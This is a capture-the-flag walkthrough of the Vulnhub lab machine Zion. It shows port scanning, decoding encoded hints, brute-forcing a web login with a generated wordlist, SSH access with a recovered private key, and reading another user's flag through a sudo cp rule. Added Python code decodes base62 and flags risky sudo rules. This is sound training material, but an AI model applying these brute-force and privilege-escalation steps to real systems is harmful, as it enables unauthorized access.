[VLN] Zion

Today we are going to hack the Vulnhub machine called Zion. You can download it from the following link: Zion

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.78
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 13:01 CEST
Nmap scan report for 192.168.1.78
Host is up (0.00096s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|_  2048 92:4b:37:54:79:d2:a8:e2:b1:90:f6:f0:95:73:75:14 (RSA)
80/tcp open  http    Apache httpd (PHP 7.4.5)
|_http-server-header: Apache
|_http-title: 403 Forbidden

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.58 seconds
When we open the website and choose the "Truth" button, the response contains the following:

Matrix-Banner: 
RGVjcnlwdCB0aGUgbWVzc2FnZSB0aGF0IFppb24gbGVmdCBmb3IgeW91LiAnT3BlbiB5b3VyIG1pbmQn
IGFuZCByZW1lbWJlciB0byBiYXNlIGl0IG9uIG5vdCB1c2luZyBhbnkgb2YgdGhlIGNoYXJhY3RlcnMg
JycrIiwgIi0iLCAiLyIgYW5kICI9Ii4=

Matrix-Message: 
7FIdtgEWjK69TYIYCpDwyx9ucnDDusp2s8nGAw9ChJ5b9SCT4MmBdI38X5DPerIEQS9zdQauLhJsN9SL
YWhmNJ128htAUKBx5pf9SCXQq308ZN8sMtah0No4z2mrKlIJwMsO8gILIzme4Pb8xuB9sUtqxI9XWWl9
z1Cqv9y8bs3o47BC3msuzdAcBAB8hzbVO04Wqu8xhLe77IVcr9OEJEMCCgO89J4YJ0R7MO88gIJQOVkX
9t8XANRXyCWjw8xmUdF1pGK3bHyFgqQo
The Matrix-Banner is base64, so we decode it to see what it says.

sml@Cassandra:~$ echo "RGVjcnlwdCB0aGUgbWVzc2FnZSB0aGF0IFppb24gbGVmdCBmb3IgeW91LiAnT3BlbiB5b3VyIG1pbmQnIGFuZCByZW1lbWJlciB0byBiYXNlIGl0IG9uIG5vdCB1c2luZyBhbnkgb2YgdGhlIGNoYXJhY3RlcnMgJycrIiwgIi0iLCAiLyIgYW5kICI9Ii4" | base64 -d
The message is the following:

Decrypt the message that Zion left for you. 'Open your mind' and remember to 
base it on not using any of the characters ''+", "-", "/" and "=".
With that hint (no "+", "-", "/" or "=", which rules out base64), it is pointing at base62, so we take the "Matrix-Message" and decode it as base62: http://decode-base62.nichabi.com/ Decoding it gives us:

The username/password information for accessing the "Zion's System" is on the 
page where you made your choice. 
To make it easier, the user "morpheus.thematrix" likes the simplicity of his 
passwords.
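An offline base62 decoder for the Matrix-Message step above, added here as an example (it is not code from the original write-up nor from the web tool). It assumes the decoder treats the text as one big-endian integer over the digits 0-9, A-Z, a-z (the alphabet GMP uses for base 62); if the online tool uses a different digit order, change ALPHABET.

```python
# Added example, not part of the original write-up: decode the base62
# "Matrix-Message" locally instead of pasting CTF data into a website.
# ASSUMPTION: the message is one big-endian integer written in base 62
# with digits 0-9, A-Z, a-z (the GMP base-62 alphabet).
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Characters the decoded banner says are NOT used: this is what rules out
# base64 (+ / =) and URL-safe base64 (- _ =) and points at base62.
FORBIDDEN = set("+-/=")


def looks_like_base62(text: str) -> bool:
    """Triage a blob: only 0-9A-Za-z and none of the banner's forbidden characters."""
    return bool(text) and not (set(text) & FORBIDDEN) and set(text) <= set(ALPHABET)


def base62_decode(text: str, alphabet: str = ALPHABET) -> bytes:
    """Interpret text as a base-62 integer and return its big-endian bytes.

    Leading NUL bytes of the original data cannot be recovered (the integer
    drops them), which is fine for printable messages like this one.
    """
    value = 0
    for ch in text:
        digit = alphabet.find(ch)
        if digit < 0:
            raise ValueError(f"{ch!r} is not a base62 digit: wrong alphabet or not base62")
        value = value * 62 + digit
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def base62_encode(data: bytes, alphabet: str = ALPHABET) -> str:
    """Inverse of base62_decode, used here to round-trip test the decoder."""
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 62)
        digits.append(alphabet[rem])
    return "".join(reversed(digits)) or alphabet[0]


if __name__ == "__main__":
    import sys
    # Whitespace is stripped so a line-wrapped header value can be pasted as-is.
    blob = "".join(sys.argv[1].split()) if len(sys.argv) > 1 else base62_encode(b"Open your mind")
    if looks_like_base62(blob):
        print(base62_decode(blob).decode("utf-8", errors="replace"))
    else:
        print("not base62: contains one of + - / = or a non-alphanumeric character")
```

Run it with the Matrix-Message as the first argument; under the alphabet assumption it prints the username hint quoted above.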
Knowing this, we build a wordlist with every word that appears on the website and convert them to lowercase, since that is "the simplest".

sml@Cassandra:~$ cewl http://192.168.1.23 > dict1.txt
sml@Cassandra:~$ cat dict1.txt | tr '[:upper:]' '[:lower:]' > dict2.txt
Now that we have the wordlist (dict2.txt), we start Burp and run the brute force. After the "brute force" we see that the password is: interpreted. We log into the website and it talks about the user w.rabbit. We go to Private key... and we can see an RSA key that is missing the typical first and last "lines", so we add them and paste the private key in between. It would look like this:

-----BEGIN OPENSSH PRIVATE KEY-----
(private key body omitted)
-----END OPENSSH PRIVATE KEY-----
We save it as rabbit.key and give it the appropriate permissions:

sml@Cassandra:~$ chmod 600 rabbit.key
We try to connect using this key and the user w.rabbit.

Low shell



sml@Cassandra:~$ ssh -i rabbit.key w.rabbit@192.168.1.23
[w.rabbit@zionserver ~]$ cat warning.txt 
Congratulations on making it this far.
The goal is to read the /home/dozer/flag.txt file.
Use the method and techniques you prefer.
We inspect the system and see that /var/mail/w.rabbit contains data of interest to us :)

[w.rabbit@zionserver bin]$ cat /var/mail/w.rabbit
Remember to write down the new password before I forget it.
OLDPASS: Admin129
NEWPASS: P@s5w0rd#2020
Knowing the password, we check whether we can use sudo...

flag.txt (dozer)



[w.rabbit@zionserver mail]$ sudo -l
[sudo] password for w.rabbit: 
User w.rabbit may run the following commands on zionserver:
    (dozer) /bin/cp
We can run cp as dozer, and what we need is to read /home/dozer/flag.txt... so we copy it somewhere we can read it, dropping dozer's mode and ownership:

[w.rabbit@zionserver ~]$ /bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/fuckingflag.txt
[sudo] password for w.rabbit: 
[w.rabbit@zionserver ~]$ cat /tmp/fuckingflag.txt 
__        __   _
\ \      / /__| | ___ ___  _ __ ___   ___
 \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
  \ V  V /  __/ | (_| (_) | | | | | |  __/
   \_/\_/ \___|_|\___\___/|_| |_| |_|\___|

 _____   _____ _          ______
|_   _|_|_   _| |__   ___|__  (_) ___  _ __
  | |/ _ \| | | '_ \ / _ \ / /| |/ _ \| '_ \
  | | (_) | | | | | |  __// /_| | (_) | | | |
  |_|\___/|_| |_| |_|\___/____|_|\___/|_| |_|

----------------------------------------------
Congratulations!!

Hope you enjoyed Zion:1. Just wanted to send a big thanks out there
to all those who have privied feedback, and who have taken time to
complete these little challenges. 

If you enjoyed this CTF, send me a tweet via @mrhenrike

So, take your award:

flag = challUG{Th1nk_0u7_0f_th3_60x}

End


And with this we have the "dozer" flag :)
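The sudo rule above is the whole privilege escalation: a rule that lets one user run a file-copy utility as another account is equivalent to read access to that account's files. The following check over "sudo -l" output is an added example (not from the write-up); the list of binaries and the sample output are constructed for it.

```python
# Added example, not from the original write-up: flag sudo rules that hand
# a file-copy or file-dump utility to another user. As the "(dozer) /bin/cp"
# rule on Zion shows, such a rule is read access to everything that user
# can read, because the file can be copied to a location the caller owns.
import re

# Constructed list: utilities whose normal job is to copy or print file contents.
FILE_READ_BINARIES = {
    "cp", "cat", "dd", "tee", "rsync", "tar", "install",
    "less", "more", "head", "tail", "xxd", "base64",
}

# One "sudo -l" rule line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:[A-Z]+:\s*)*(?P<cmds>.+)$")


def risky_sudo_rules(sudo_l_output: str) -> list:
    """Return (runas, command) pairs that grant file-copy/dump ability."""
    findings = []
    for line in sudo_l_output.splitlines():
        match = RULE_RE.match(line)
        if not match:
            continue  # header line, not a rule
        runas = match.group("runas").strip()
        for cmd in match.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            program = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or program in FILE_READ_BINARIES:
                findings.append((runas, cmd))
    return findings


# Constructed sample modelled on the "sudo -l" output in the write-up.
SAMPLE_SUDO_L = """User w.rabbit may run the following commands on zionserver:
    (dozer) /bin/cp
    (root) NOPASSWD: /usr/bin/systemctl status sshd
"""

if __name__ == "__main__":
    for runas, cmd in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"{cmd} runnable as {runas}: equivalent to reading {runas}'s files")
```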